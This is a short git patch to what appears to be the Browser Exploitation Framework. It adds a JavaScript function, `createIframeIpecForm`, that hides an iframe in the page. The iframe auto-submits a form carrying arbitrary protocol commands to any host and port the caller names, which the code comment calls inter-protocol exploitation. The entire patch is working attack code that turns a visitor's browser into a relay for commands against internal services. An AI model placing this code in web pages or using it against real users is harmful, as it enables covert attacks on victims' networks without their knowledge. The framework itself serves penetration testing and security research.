From 72ac600f9f3cb02f4441090c0b1054b86351bb47 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 27 Oct 2012 18:53:29 +1030
Subject: [PATCH] Add `createIframeIpecForm` function to client dom library

---
 core/main/client/dom.js | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)

diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index 4cb0c2cba..70e6bad85 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -340,6 +340,30 @@ beef.dom = {
         formXsrf.submit();
 
         return iframeXsrf;
+    },
+
+    /**
+     * Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
+     * @params: {String} rhost: remote host ip/domain
+     * @params: {String} rport: remote port
+     * @params: {String} commands: protocol commands to be executed by the remote host:port service
+     */
+    createIframeIpecForm: function(rhost, rport, commands){
+        var iframeIpec = beef.dom.createInvisibleIframe();
+
+        var formIpec = document.createElement('form');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('method',  'POST');
+        formIpec.setAttribute('enctype', 'multipart/form-data');
+
+        input = document.createElement('textarea');
+        input.setAttribute('name', Math.random().toString(36).substring(5));
+        input.value = commands;
+        formIpec.appendChild(input);
+        iframeIpec.contentWindow.document.body.appendChild(formIpec);
+        formIpec.submit();
+
+        return iframeIpec;
     }
 
 };